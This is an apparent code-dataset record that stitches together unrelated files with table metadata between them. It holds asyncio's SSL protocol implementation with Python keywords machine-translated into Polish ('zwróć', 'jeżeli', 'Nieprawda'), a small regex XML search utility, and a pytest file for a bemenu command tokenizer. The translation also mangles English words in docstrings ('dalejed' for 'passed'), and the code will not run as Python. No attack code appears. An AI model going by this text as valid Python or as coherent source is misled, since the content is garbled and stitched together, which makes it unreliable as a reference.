high-water limit. Setting high to zero forces low to zero as
well, oraz causes pause_writing() to be called whenever the
buffer becomes non-empty. Setting low to zero causes
resume_writing() to be called only once the buffer jest empty.
Use of zero dla either limit jest generally sub-optimal jako it
reduces opportunities dla doing I/O oraz computation
concurrently.
"""
self._ssl_protocol._transport.set_write_buffer_limits(high, low)
def get_write_buffer_size(self):
"""Return the current size of the write buffer."""
zwróć self._ssl_protocol._transport.get_write_buffer_size()
jeżeli nie data:
zwróć
self._ssl_protocol._write_appdata(data)
def can_write_eof(self):
"""Return Prawda jeżeli this transport supports write_eof(), Nieprawda jeżeli not."""
zwróć Nieprawda
def abort(self):
"""Close the transport immediately.
Buffered data will be lost. No more data will be received.
The protocol's connection_lost() method will (eventually) be
called przy Nic jako its argument.
"""
self._ssl_protocol._abort()
klasa SSLProtocol(protocols.Protocol):
"""SSL protocol.
Implementation of SSL on top of a socket using incoming oraz outgoing
buffers which are ssl.MemoryBIO objects.
"""
self._waiter = Nic
def connection_made(self, transport):
"""Called when the low-level connection jest made.
Start the SSL handshake.
"""
self._transport = transport
self._sslpipe = _SSLPipe(self._sslcontext,
self._server_side,
self._server_hostname)
self._start_handshake()
def connection_lost(self, exc):
"""Called when the low-level connection jest lost albo closed.
The argument jest an exception object albo Nic (the latter
meaning a regular EOF jest received albo the connection was
aborted albo closed).
"""
jeżeli self._session_established:
self._session_established = Nieprawda
self._loop.call_soon(self._app_protocol.connection_lost, exc)
self._transport = Nic
self._app_transport = Nic
def pause_writing(self):
"""Called when the low-level transport's buffer goes over
the high-water mark.
"""
self._app_protocol.pause_writing()
def resume_writing(self):
"""Called when the low-level transport's buffer drains below
the low-water mark.
"""
self._app_protocol.resume_writing()
def data_received(self, data):
"""Called when some SSL data jest received.
The argument jest a bytes object.
"""
spróbuj:
ssldata, appdata = self._sslpipe.feed_ssldata(data)
wyjąwszy ssl.SSLError jako e:
jeżeli self._loop.get_debug():
logger.warning('%r: SSL error %s (reason %s)',
self, e.errno, e.reason)
self._abort()
zwróć
dla chunk w ssldata:
self._transport.write(chunk)
dla chunk w appdata:
jeżeli chunk:
self._app_protocol.data_received(chunk)
inaczej:
self._start_shutdown()
przerwij
def eof_received(self):
"""Called when the other end of the low-level stream
jest half-closed.
If this returns a false value (including Nic), the transport
will close itself. If it returns a true value, closing the
transport jest up to the protocol.
"""
spróbuj:
jeżeli self._loop.get_debug():
logger.debug("%r received EOF", self)
self._wakeup_waiter(ConnectionResetError)
jeżeli nie self._in_handshake:
keep_open = self._app_protocol.eof_received()
jeżeli keep_open:
logger.warning('returning true z eof_received() '
'has no effect when using ssl')
w_końcu:
self._transport.close()
def _get_extra_info(self, name, default=Nic):
jeżeli name w self._extra:
zwróć self._extra[name]
inaczej:
zwróć self._transport.get_extra_info(name, default)
def _start_shutdown(self):
jeżeli self._in_shutdown:
zwróć
self._in_shutdown = Prawda
self._write_appdata(b'')
def _write_appdata(self, data):
self._write_backlog.append((data, 0))
self._write_buffer_size += len(data)
self._process_write_backlog()
def _start_handshake(self):
jeżeli self._loop.get_debug():
logger.debug("%r starts SSL handshake", self)
self._handshake_start_time = self._loop.time()
inaczej:
self._handshake_start_time = Nic
self._in_handshake = Prawda
# (b'', 1) jest a special value w _process_write_backlog() to do
# the SSL handshake
self._write_backlog.append((b'', 1))
self._loop.call_soon(self._process_write_backlog)
def _on_handshake_complete(self, handshake_exc):
self._in_handshake = Nieprawda
sslobj = self._sslpipe.ssl_object
spróbuj:
jeżeli handshake_exc jest nie Nic:
podnieś handshake_exc
peercert = sslobj.getpeercert()
jeżeli nie hasattr(self._sslcontext, 'check_hostname'):
# Verify hostname jeżeli requested, Python 3.4+ uses check_hostname
# oraz checks the hostname w do_handshake()
jeżeli (self._server_hostname
oraz self._sslcontext.verify_mode != ssl.CERT_NONE):
ssl.match_hostname(peercert, self._server_hostname)
wyjąwszy BaseException jako exc:
jeżeli self._loop.get_debug():
jeżeli isinstance(exc, ssl.CertificateError):
logger.warning("%r: SSL handshake failed "
"on verifying the certificate",
self, exc_info=Prawda)
inaczej:
logger.warning("%r: SSL handshake failed",
self, exc_info=Prawda)
self._transport.close()
jeżeli isinstance(exc, Exception):
self._wakeup_waiter(exc)
zwróć
inaczej:
podnieś
jeżeli self._loop.get_debug():
dt = self._loop.time() - self._handshake_start_time
logger.debug("%r: SSL handshake took %.1f ms", self, dt * 1e3)
# Add extra info that becomes available after handshake.
self._extra.update(peercert=peercert,
cipher=sslobj.cipher(),
compression=sslobj.compression(),
)
self._app_protocol.connection_made(self._app_transport)
self._wakeup_waiter()
self._session_established = Prawda
# In case transport.write() was already called. Don't call
# immediatly _process_write_backlog(), but schedule it:
# _on_handshake_complete() can be called indirectly from
# _process_write_backlog(), oraz _process_write_backlog() jest nie
# reentrant.
self._loop.call_soon(self._process_write_backlog)
def _process_write_backlog(self):
# Try to make progress on the write backlog.
jeżeli self._transport jest Nic:
zwróć
spróbuj:
dla i w range(len(self._write_backlog)):
data, offset = self._write_backlog[0]
jeżeli data:
ssldata, offset = self._sslpipe.feed_appdata(data, offset)
albo_inaczej offset:
ssldata = self._sslpipe.do_handshake(
self._on_handshake_complete)
offset = 1
inaczej:
ssldata = self._sslpipe.shutdown(self._finalize)
offset = 1
dla chunk w ssldata:
self._transport.write(chunk)
jeżeli offset < len(data):
self._write_backlog[0] = (data, offset)
# A short write means that a write jest blocked on a read
# We need to enable reading jeżeli it jest paused!
assert self._sslpipe.need_ssldata
jeżeli self._transport._paused:
self._transport.resume_reading()
przerwij
# An entire chunk z the backlog was processed. We can
# delete it oraz reduce the outstanding buffer size.
usuń self._write_backlog[0]
self._write_buffer_size -= len(data)
wyjąwszy BaseException jako exc:
jeżeli self._in_handshake:
# BaseExceptions will be re-raised w _on_handshake_complete.
self._on_handshake_complete(exc)
inaczej:
self._fatal_error(exc, 'Fatal error on SSL transport')
jeżeli nie isinstance(exc, Exception):
# BaseException
podnieś
def _fatal_error(self, exc, message='Fatal error on transport'):
# Should be called z exception handler only.
jeżeli isinstance(exc, (BrokenPipeError, ConnectionResetError)):
jeżeli self._loop.get_debug():
logger.debug("%r: %s", self, message, exc_info=Prawda)
inaczej:
self._loop.call_exception_handler({
'message': message,
'exception': exc,
'transport': self._transport,
'protocol': self,
})
jeżeli self._transport:
self._transport._force_close(exc)
def _finalize(self):
jeżeli self._transport jest nie Nic:
self._transport.close()
def _abort(self):
jeżeli self._transport jest nie Nic:
spróbuj:
self._transport.abort()
w_końcu:
self._finalize()
| 38.284866 | 93 | 0.610332 | zaimportuj collections
zaimportuj warnings
spróbuj:
zaimportuj ssl
wyjąwszy ImportError: # pragma: no cover
ssl = Nic
z . zaimportuj compat
z . zaimportuj protocols
z . zaimportuj transports
z .log zaimportuj logger
def _create_transport_context(server_side, server_hostname):
    # Build a default SSLContext for a *client-side* transport.
    # Server-side transports must always supply an explicit context.
    # NOTE: this file uses Polish-translated Python keywords
    # (jeżeli = if, podnieś = raise, zwróć = return, Nieprawda = False).
    jeżeli server_side:
        podnieś ValueError('Server side SSL needs a valid SSLContext')
    # Client side may pass ssl=True to use a default context; in that
    # case the sslcontext passed in is None.  The default is secure
    # for client connections.
    jeżeli hasattr(ssl, 'create_default_context'):
        # Python 3.4+: use up-to-date strong settings.
        sslcontext = ssl.create_default_context()
        jeżeli nie server_hostname:
            # No hostname to verify against, so disable hostname checking.
            sslcontext.check_hostname = Nieprawda
    inaczej:
        # Fallback for Python 3.3: hand-build a reasonably secure context.
        sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        sslcontext.options |= ssl.OP_NO_SSLv2
        sslcontext.options |= ssl.OP_NO_SSLv3
        sslcontext.set_default_verify_paths()
        # Require certificate validation against the system trust store.
        sslcontext.verify_mode = ssl.CERT_REQUIRED
    zwróć sslcontext
def _is_sslproto_available():
    # ssl.MemoryBIO (required by _SSLPipe below) only exists when the
    # interpreter's ssl module is new enough (CPython 3.5+).
    zwróć hasattr(ssl, "MemoryBIO")
# States of an _SSLPipe.
_UNWRAPPED = "UNWRAPPED"
_DO_HANDSHAKE = "DO_HANDSHAKE"
_WRAPPED = "WRAPPED"
_SHUTDOWN = "SHUTDOWN"
klasa _SSLPipe(object):
"""An SSL "Pipe".
An SSL pipe allows you to communicate przy an SSL/TLS protocol instance
through memory buffers. It can be used to implement a security layer dla an
existing connection where you don't have access to the connection's file
descriptor, albo dla some reason you don't want to use it.
An SSL pipe can be w "wrapped" oraz "unwrapped" mode. In unwrapped mode,
data jest dalejed through untransformed. In wrapped mode, application level
data jest encrypted to SSL record level data oraz vice versa. The SSL record
level jest the lowest level w the SSL protocol suite oraz jest what travels
as-is over the wire.
An SslPipe initially jest w "unwrapped" mode. To start SSL, call
do_handshake(). To shutdown SSL again, call unwrap().
"""
max_size = 256 * 1024 # Buffer size dalejed to read()
def __init__(self, context, server_side, server_hostname=Nic):
"""
The *context* argument specifies the ssl.SSLContext to use.
The *server_side* argument indicates whether this jest a server side albo
client side transport.
The optional *server_hostname* argument can be used to specify the
hostname you are connecting to. You may only specify this parameter if
the _ssl module supports Server Name Indication (SNI).
"""
self._context = context
self._server_side = server_side
self._server_hostname = server_hostname
self._state = _UNWRAPPED
self._incoming = ssl.MemoryBIO()
self._outgoing = ssl.MemoryBIO()
self._sslobj = Nic
self._need_ssldata = Nieprawda
self._handshake_cb = Nic
self._shutdown_cb = Nic
@property
def context(self):
"""The SSL context dalejed to the constructor."""
zwróć self._context
@property
def ssl_object(self):
"""The internal ssl.SSLObject instance.
Return Nic jeżeli the pipe jest nie wrapped.
"""
zwróć self._sslobj
@property
def need_ssldata(self):
"""Whether more record level data jest needed to complete a handshake
that jest currently w progress."""
zwróć self._need_ssldata
@property
def wrapped(self):
"""
Whether a security layer jest currently w effect.
Return Nieprawda during handshake.
"""
zwróć self._state == _WRAPPED
def do_handshake(self, callback=Nic):
"""Start the SSL handshake.
Return a list of ssldata. A ssldata element jest a list of buffers
The optional *callback* argument can be used to install a callback that
will be called when the handshake jest complete. The callback will be
called przy Nic jeżeli successful, inaczej an exception instance.
"""
jeżeli self._state != _UNWRAPPED:
podnieś RuntimeError('handshake w progress albo completed')
self._sslobj = self._context.wrap_bio(
self._incoming, self._outgoing,
server_side=self._server_side,
server_hostname=self._server_hostname)
self._state = _DO_HANDSHAKE
self._handshake_cb = callback
ssldata, appdata = self.feed_ssldata(b'', only_handshake=Prawda)
assert len(appdata) == 0
zwróć ssldata
def shutdown(self, callback=Nic):
"""Start the SSL shutdown sequence.
Return a list of ssldata. A ssldata element jest a list of buffers
The optional *callback* argument can be used to install a callback that
will be called when the shutdown jest complete. The callback will be
called without arguments.
"""
jeżeli self._state == _UNWRAPPED:
podnieś RuntimeError('no security layer present')
jeżeli self._state == _SHUTDOWN:
podnieś RuntimeError('shutdown w progress')
assert self._state w (_WRAPPED, _DO_HANDSHAKE)
self._state = _SHUTDOWN
self._shutdown_cb = callback
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] albo appdata == [b'']
zwróć ssldata
def feed_eof(self):
"""Send a potentially "ragged" EOF.
This method will podnieś an SSL_ERROR_EOF exception jeżeli the EOF jest
unexpected.
"""
self._incoming.write_eof()
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] albo appdata == [b'']
def feed_ssldata(self, data, only_handshake=Nieprawda):
"""Feed SSL record level data into the pipe.
The data must be a bytes instance. It jest OK to send an empty bytes
instance. This can be used to get ssldata dla a handshake initiated by
this endpoint.
Return a (ssldata, appdata) tuple. The ssldata element jest a list of
buffers containing SSL data that needs to be sent to the remote SSL.
The appdata element jest a list of buffers containing plaintext data that
needs to be forwarded to the application. The appdata list may contain
an empty buffer indicating an SSL "close_notify" alert. This alert must
be acknowledged by calling shutdown().
"""
jeżeli self._state == _UNWRAPPED:
# If unwrapped, dalej plaintext data straight through.
jeżeli data:
appdata = [data]
inaczej:
appdata = []
zwróć ([], appdata)
self._need_ssldata = Nieprawda
jeżeli data:
self._incoming.write(data)
ssldata = []
appdata = []
spróbuj:
jeżeli self._state == _DO_HANDSHAKE:
# Call do_handshake() until it doesn't podnieś anymore.
self._sslobj.do_handshake()
self._state = _WRAPPED
jeżeli self._handshake_cb:
self._handshake_cb(Nic)
jeżeli only_handshake:
zwróć (ssldata, appdata)
# Handshake done: execute the wrapped block
jeżeli self._state == _WRAPPED:
# Main state: read data z SSL until close_notify
dopóki Prawda:
chunk = self._sslobj.read(self.max_size)
appdata.append(chunk)
jeżeli nie chunk: # close_notify
przerwij
albo_inaczej self._state == _SHUTDOWN:
# Call shutdown() until it doesn't podnieś anymore.
self._sslobj.unwrap()
self._sslobj = Nic
self._state = _UNWRAPPED
jeżeli self._shutdown_cb:
self._shutdown_cb()
albo_inaczej self._state == _UNWRAPPED:
# Drain possible plaintext data after close_notify.
appdata.append(self._incoming.read())
wyjąwszy (ssl.SSLError, ssl.CertificateError) jako exc:
jeżeli getattr(exc, 'errno', Nic) nie w (
ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
jeżeli self._state == _DO_HANDSHAKE oraz self._handshake_cb:
self._handshake_cb(exc)
podnieś
self._need_ssldata = (exc.errno == ssl.SSL_ERROR_WANT_READ)
# Check dla record level data that needs to be sent back.
# Happens dla the initial handshake oraz renegotiations.
jeżeli self._outgoing.pending:
ssldata.append(self._outgoing.read())
zwróć (ssldata, appdata)
def feed_appdata(self, data, offset=0):
"""Feed plaintext data into the pipe.
Return an (ssldata, offset) tuple. The ssldata element jest a list of
buffers containing record level data that needs to be sent to the
remote SSL instance. The offset jest the number of plaintext bytes that
were processed, which may be less than the length of data.
NOTE: In case of short writes, this call MUST be retried przy the SAME
buffer dalejed into the *data* argument (i.e. the id() must be the
same). This jest an OpenSSL requirement. A further particularity jest that
a short write will always have offset == 0, because the _ssl module
does nie enable partial writes. And even though the offset jest zero,
there will still be encrypted data w ssldata.
"""
assert 0 <= offset <= len(data)
jeżeli self._state == _UNWRAPPED:
# dalej through data w unwrapped mode
jeżeli offset < len(data):
ssldata = [data[offset:]]
inaczej:
ssldata = []
zwróć (ssldata, len(data))
ssldata = []
view = memoryview(data)
dopóki Prawda:
self._need_ssldata = Nieprawda
spróbuj:
jeżeli offset < len(view):
offset += self._sslobj.write(view[offset:])
wyjąwszy ssl.SSLError jako exc:
# It jest nie allowed to call write() after unwrap() until the
# close_notify jest acknowledged. We zwróć the condition to the
# caller jako a short write.
jeżeli exc.reason == 'PROTOCOL_IS_SHUTDOWN':
exc.errno = ssl.SSL_ERROR_WANT_READ
jeżeli exc.errno nie w (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
podnieś
self._need_ssldata = (exc.errno == ssl.SSL_ERROR_WANT_READ)
# See jeżeli there's any record level data back dla us.
jeżeli self._outgoing.pending:
ssldata.append(self._outgoing.read())
jeżeli offset == len(view) albo self._need_ssldata:
przerwij
zwróć (ssldata, offset)
klasa _SSLProtocolTransport(transports._FlowControlMixin,
transports.Transport):
def __init__(self, loop, ssl_protocol, app_protocol):
self._loop = loop
self._ssl_protocol = ssl_protocol
self._app_protocol = app_protocol
self._closed = Nieprawda
def get_extra_info(self, name, default=Nic):
"""Get optional transport information."""
zwróć self._ssl_protocol._get_extra_info(name, default)
def close(self):
"""Close the transport.
Buffered data will be flushed asynchronously. No more data
will be received. After all buffered data jest flushed, the
protocol's connection_lost() method will (eventually) called
przy Nic jako its argument.
"""
self._closed = Prawda
self._ssl_protocol._start_shutdown()
# On Python 3.3 oraz older, objects przy a destructor part of a reference
# cycle are never destroyed. It's nie more the case on Python 3.4 thanks
# to the PEP 442.
jeżeli compat.PY34:
def __del__(self):
jeżeli nie self._closed:
warnings.warn("unclosed transport %r" % self, ResourceWarning)
self.close()
def pause_reading(self):
"""Pause the receiving end.
No data will be dalejed to the protocol's data_received()
method until resume_reading() jest called.
"""
self._ssl_protocol._transport.pause_reading()
def resume_reading(self):
"""Resume the receiving end.
Data received will once again be dalejed to the protocol's
data_received() method.
"""
self._ssl_protocol._transport.resume_reading()
def set_write_buffer_limits(self, high=Nic, low=Nic):
"""Set the high- oraz low-water limits dla write flow control.
These two values control when to call the protocol's
pause_writing() oraz resume_writing() methods. If specified,
the low-water limit must be less than albo equal to the
high-water limit. Neither value can be negative.
The defaults are implementation-specific. If only the
high-water limit jest given, the low-water limit defaults to a
implementation-specific value less than albo equal to the
high-water limit. Setting high to zero forces low to zero as
well, oraz causes pause_writing() to be called whenever the
buffer becomes non-empty. Setting low to zero causes
resume_writing() to be called only once the buffer jest empty.
Use of zero dla either limit jest generally sub-optimal jako it
reduces opportunities dla doing I/O oraz computation
concurrently.
"""
self._ssl_protocol._transport.set_write_buffer_limits(high, low)
def get_write_buffer_size(self):
"""Return the current size of the write buffer."""
zwróć self._ssl_protocol._transport.get_write_buffer_size()
def write(self, data):
"""Write some data bytes to the transport.
This does nie block; it buffers the data oraz arranges dla it
to be sent out asynchronously.
"""
jeżeli nie isinstance(data, (bytes, bytearray, memoryview)):
podnieś TypeError("data: expecting a bytes-like instance, got {!r}"
.format(type(data).__name__))
jeżeli nie data:
zwróć
self._ssl_protocol._write_appdata(data)
def can_write_eof(self):
"""Return Prawda jeżeli this transport supports write_eof(), Nieprawda jeżeli not."""
zwróć Nieprawda
def abort(self):
"""Close the transport immediately.
Buffered data will be lost. No more data will be received.
The protocol's connection_lost() method will (eventually) be
called przy Nic jako its argument.
"""
self._ssl_protocol._abort()
klasa SSLProtocol(protocols.Protocol):
"""SSL protocol.
Implementation of SSL on top of a socket using incoming oraz outgoing
buffers which are ssl.MemoryBIO objects.
"""
def __init__(self, loop, app_protocol, sslcontext, waiter,
server_side=Nieprawda, server_hostname=Nic):
jeżeli ssl jest Nic:
podnieś RuntimeError('stdlib ssl module nie available')
jeżeli nie sslcontext:
sslcontext = _create_transport_context(server_side, server_hostname)
self._server_side = server_side
jeżeli server_hostname oraz nie server_side:
self._server_hostname = server_hostname
inaczej:
self._server_hostname = Nic
self._sslcontext = sslcontext
# SSL-specific extra info. More info are set when the handshake
# completes.
self._extra = dict(sslcontext=sslcontext)
# App data write buffering
self._write_backlog = collections.deque()
self._write_buffer_size = 0
self._waiter = waiter
self._loop = loop
self._app_protocol = app_protocol
self._app_transport = _SSLProtocolTransport(self._loop,
self, self._app_protocol)
self._sslpipe = Nic
self._session_established = Nieprawda
self._in_handshake = Nieprawda
self._in_shutdown = Nieprawda
self._transport = Nic
def _wakeup_waiter(self, exc=Nic):
jeżeli self._waiter jest Nic:
zwróć
jeżeli nie self._waiter.cancelled():
jeżeli exc jest nie Nic:
self._waiter.set_exception(exc)
inaczej:
self._waiter.set_result(Nic)
self._waiter = Nic
def connection_made(self, transport):
"""Called when the low-level connection jest made.
Start the SSL handshake.
"""
self._transport = transport
self._sslpipe = _SSLPipe(self._sslcontext,
self._server_side,
self._server_hostname)
self._start_handshake()
def connection_lost(self, exc):
"""Called when the low-level connection jest lost albo closed.
The argument jest an exception object albo Nic (the latter
meaning a regular EOF jest received albo the connection was
aborted albo closed).
"""
jeżeli self._session_established:
self._session_established = Nieprawda
self._loop.call_soon(self._app_protocol.connection_lost, exc)
self._transport = Nic
self._app_transport = Nic
def pause_writing(self):
"""Called when the low-level transport's buffer goes over
the high-water mark.
"""
self._app_protocol.pause_writing()
def resume_writing(self):
"""Called when the low-level transport's buffer drains below
the low-water mark.
"""
self._app_protocol.resume_writing()
def data_received(self, data):
"""Called when some SSL data jest received.
The argument jest a bytes object.
"""
spróbuj:
ssldata, appdata = self._sslpipe.feed_ssldata(data)
wyjąwszy ssl.SSLError jako e:
jeżeli self._loop.get_debug():
logger.warning('%r: SSL error %s (reason %s)',
self, e.errno, e.reason)
self._abort()
zwróć
dla chunk w ssldata:
self._transport.write(chunk)
dla chunk w appdata:
jeżeli chunk:
self._app_protocol.data_received(chunk)
inaczej:
self._start_shutdown()
przerwij
def eof_received(self):
"""Called when the other end of the low-level stream
jest half-closed.
If this returns a false value (including Nic), the transport
will close itself. If it returns a true value, closing the
transport jest up to the protocol.
"""
spróbuj:
jeżeli self._loop.get_debug():
logger.debug("%r received EOF", self)
self._wakeup_waiter(ConnectionResetError)
jeżeli nie self._in_handshake:
keep_open = self._app_protocol.eof_received()
jeżeli keep_open:
logger.warning('returning true z eof_received() '
'has no effect when using ssl')
w_końcu:
self._transport.close()
def _get_extra_info(self, name, default=Nic):
jeżeli name w self._extra:
zwróć self._extra[name]
inaczej:
zwróć self._transport.get_extra_info(name, default)
def _start_shutdown(self):
jeżeli self._in_shutdown:
zwróć
self._in_shutdown = Prawda
self._write_appdata(b'')
def _write_appdata(self, data):
self._write_backlog.append((data, 0))
self._write_buffer_size += len(data)
self._process_write_backlog()
def _start_handshake(self):
jeżeli self._loop.get_debug():
logger.debug("%r starts SSL handshake", self)
self._handshake_start_time = self._loop.time()
inaczej:
self._handshake_start_time = Nic
self._in_handshake = Prawda
# (b'', 1) jest a special value w _process_write_backlog() to do
# the SSL handshake
self._write_backlog.append((b'', 1))
self._loop.call_soon(self._process_write_backlog)
def _on_handshake_complete(self, handshake_exc):
self._in_handshake = Nieprawda
sslobj = self._sslpipe.ssl_object
spróbuj:
jeżeli handshake_exc jest nie Nic:
podnieś handshake_exc
peercert = sslobj.getpeercert()
jeżeli nie hasattr(self._sslcontext, 'check_hostname'):
# Verify hostname jeżeli requested, Python 3.4+ uses check_hostname
# oraz checks the hostname w do_handshake()
jeżeli (self._server_hostname
oraz self._sslcontext.verify_mode != ssl.CERT_NONE):
ssl.match_hostname(peercert, self._server_hostname)
wyjąwszy BaseException jako exc:
jeżeli self._loop.get_debug():
jeżeli isinstance(exc, ssl.CertificateError):
logger.warning("%r: SSL handshake failed "
"on verifying the certificate",
self, exc_info=Prawda)
inaczej:
logger.warning("%r: SSL handshake failed",
self, exc_info=Prawda)
self._transport.close()
jeżeli isinstance(exc, Exception):
self._wakeup_waiter(exc)
zwróć
inaczej:
podnieś
jeżeli self._loop.get_debug():
dt = self._loop.time() - self._handshake_start_time
logger.debug("%r: SSL handshake took %.1f ms", self, dt * 1e3)
# Add extra info that becomes available after handshake.
self._extra.update(peercert=peercert,
cipher=sslobj.cipher(),
compression=sslobj.compression(),
)
self._app_protocol.connection_made(self._app_transport)
self._wakeup_waiter()
self._session_established = Prawda
# In case transport.write() was already called. Don't call
# immediatly _process_write_backlog(), but schedule it:
# _on_handshake_complete() can be called indirectly from
# _process_write_backlog(), oraz _process_write_backlog() jest nie
# reentrant.
self._loop.call_soon(self._process_write_backlog)
def _process_write_backlog(self):
# Try to make progress on the write backlog.
jeżeli self._transport jest Nic:
zwróć
spróbuj:
dla i w range(len(self._write_backlog)):
data, offset = self._write_backlog[0]
jeżeli data:
ssldata, offset = self._sslpipe.feed_appdata(data, offset)
albo_inaczej offset:
ssldata = self._sslpipe.do_handshake(
self._on_handshake_complete)
offset = 1
inaczej:
ssldata = self._sslpipe.shutdown(self._finalize)
offset = 1
dla chunk w ssldata:
self._transport.write(chunk)
jeżeli offset < len(data):
self._write_backlog[0] = (data, offset)
# A short write means that a write jest blocked on a read
# We need to enable reading jeżeli it jest paused!
assert self._sslpipe.need_ssldata
jeżeli self._transport._paused:
self._transport.resume_reading()
przerwij
# An entire chunk z the backlog was processed. We can
# delete it oraz reduce the outstanding buffer size.
usuń self._write_backlog[0]
self._write_buffer_size -= len(data)
wyjąwszy BaseException jako exc:
jeżeli self._in_handshake:
# BaseExceptions will be re-raised w _on_handshake_complete.
self._on_handshake_complete(exc)
inaczej:
self._fatal_error(exc, 'Fatal error on SSL transport')
jeżeli nie isinstance(exc, Exception):
# BaseException
podnieś
def _fatal_error(self, exc, message='Fatal error on transport'):
# Should be called z exception handler only.
jeżeli isinstance(exc, (BrokenPipeError, ConnectionResetError)):
jeżeli self._loop.get_debug():
logger.debug("%r: %s", self, message, exc_info=Prawda)
inaczej:
self._loop.call_exception_handler({
'message': message,
'exception': exc,
'transport': self._transport,
'protocol': self,
})
jeżeli self._transport:
self._transport._force_close(exc)
def _finalize(self):
jeżeli self._transport jest nie Nic:
self._transport.close()
def _abort(self):
jeżeli self._transport jest nie Nic:
spróbuj:
self._transport.abort()
w_końcu:
self._finalize()
| 4,533 | 0 | 212 |
cc8eeedb7d67215bfa1d6a760e871b3c51b0bb7e | 1,077 | py | Python | fme_server_lib/FMERepositoryUtility/XMLTextUtility.py | bcgov/fme | 0564363c59ccd06fe79459ec08ff3b7c5bf7e061 | [
"Apache-2.0"
] | null | null | null | fme_server_lib/FMERepositoryUtility/XMLTextUtility.py | bcgov/fme | 0564363c59ccd06fe79459ec08ff3b7c5bf7e061 | [
"Apache-2.0"
] | 2 | 2021-07-26T20:33:16.000Z | 2021-07-26T20:33:19.000Z | fme_server_lib/FMERepositoryUtility/XMLTextUtility.py | bcgov/fme | 0564363c59ccd06fe79459ec08ff3b7c5bf7e061 | [
"Apache-2.0"
] | null | null | null | from .RegSearch import RegSearch
| 29.916667 | 67 | 0.587744 | from .RegSearch import RegSearch
class XMLTextUtility:
    """Convenience wrapper around :class:`RegSearch` for querying a block
    of XML-ish text by line and section criteria."""

    def __init__(self, text=None, section_end=None):
        """Store the document and optional section-end marker.

        :param text: raw document text to be searched.
        :param section_end: pattern marking the end of a section
            (forwarded to ``RegSearch``) -- TODO confirm exact semantics
            against RegSearch.
        """
        self.text = text
        self.section_end = section_end

    def find_sections(self, head, include_cri, exclude_cri):
        """Return sections of ``self.text`` starting with ``head`` that
        satisfy ``include_cri`` and avoid ``exclude_cri`` (delegated to
        ``RegSearch.find_sections``)."""
        search = RegSearch(self.text, self.section_end)
        return search.find_sections(head, include_cri, exclude_cri)

    def find_lines(self, criteria):
        """Return the lines of ``self.text`` matching ``criteria``
        (delegated to ``RegSearch.find_lines``)."""
        search = RegSearch(self.text)
        return search.find_lines(criteria)

    @staticmethod
    def sub_sections(sections, include_cri, exclude_cri):
        """Filter ``sections``, keeping only those whose text contains a
        line matching *every* criterion in ``include_cri`` and *no* line
        matching any criterion in ``exclude_cri``.

        NOTE(review): uses short-circuiting ``all``/``any``; assumes
        ``RegSearch.contain_line`` is a side-effect-free predicate.
        """
        result = []
        for section in sections:
            search = RegSearch(section.text)
            # Guard clauses replace the original mutable ok-flag pattern.
            if not all(search.contain_line(cri) for cri in include_cri):
                continue
            if any(search.contain_line(cri) for cri in exclude_cri):
                continue
            result.append(section)
        return result
| 894 | 126 | 23 |
b91b37c602d7161bdb18fbb612ec1c44bdb5dd70 | 2,468 | py | Python | tests/test_main.py | flopraden/bemenu-extended | 0427ec101552cf62bd0ba98d0cb83699a99ce8de | [
"MIT"
] | 1 | 2020-03-01T19:15:43.000Z | 2020-03-01T19:15:43.000Z | tests/test_main.py | flopraden/bemenu-extended | 0427ec101552cf62bd0ba98d0cb83699a99ce8de | [
"MIT"
] | null | null | null | tests/test_main.py | flopraden/bemenu-extended | 0427ec101552cf62bd0ba98d0cb83699a99ce8de | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf8 -*-
import mock
import pytest
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
import bemenu_extended as d
menu = d.bemenu()
| 60.195122 | 182 | 0.651135 | #! /usr/bin/env python
# -*- coding: utf8 -*-
import mock
import pytest
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
import bemenu_extended as d
menu = d.bemenu()
def test_required_variables_available():
    """Sanity-check module constants: the cache path must end with the
    application's directory name."""
    assert d.path_cache[-len('bemenu-extended'):] == 'bemenu-extended'
def test_command_to_list():
    """Exercise ``bemenu.command_to_list`` shell-like tokenisation:
    list vs. string input, non-ASCII characters (``ö`` == ``\\xf6``),
    and quoted paths containing spaces (quoted spans stay one token,
    unquoted spaces split)."""
    assert menu.command_to_list(['a', 'b', 'c']) == [u'a', u'b', u'c']
    assert menu.command_to_list('a b c') == [u'a', u'b', u'c']
    assert menu.command_to_list(['a', 'b c']) == [u'a', u'b', u'c']
    assert menu.command_to_list(['a', 'b', 'c', 'aö']) == [u'a', u'b', u'c', u'a\xf6']
    assert menu.command_to_list('a b c aö') == [u'a', u'b', u'c', u'a\xf6']
    assert menu.command_to_list([u'a', u'b c aö']) == [u'a', u'b', u'c', u'a\xf6']
    assert menu.command_to_list('xdg-open "/home/user/aö/"') == [u'xdg-open', u'/home/user/a\xf6/']
    assert menu.command_to_list('xdg-open /home/user/aö/') == [u'xdg-open', u'/home/user/a\xf6/']
    assert menu.command_to_list('xdg-open "/home/user/aö/filename"') == [u'xdg-open', u'/home/user/a\xf6/filename']
    assert menu.command_to_list('xdg-open "/home/user/aö/file name"') == [u'xdg-open', u'/home/user/a\xf6/file name']
    assert menu.command_to_list('xdg-open /home/user/aö/filename') == [u'xdg-open', u'/home/user/a\xf6/filename']
    assert menu.command_to_list('xdg-open /home/user/aö/file name') == [u'xdg-open', u'/home/user/a\xf6/file', 'name']
    assert menu.command_to_list('xdg-open "/home/user/aö/foldername/"') == [u'xdg-open', u'/home/user/a\xf6/foldername/']
    assert menu.command_to_list('xdg-open "/home/user/aö/folder name/"') == [u'xdg-open', u'/home/user/a\xf6/folder name/']
    assert menu.command_to_list('xdg-open /home/user/aö/folder name/') == [u'xdg-open', u'/home/user/a\xf6/folder', 'name/']
    assert menu.command_to_list('xdg-open /home/user/aö/foldername/') == [u'xdg-open', u'/home/user/a\xf6/foldername/']
    assert menu.command_to_list('xdg-open "/home/user/aö/"foldernam "e/"') == [u'xdg-open', u'/home/user/a\xf6/foldernam', u'e/']
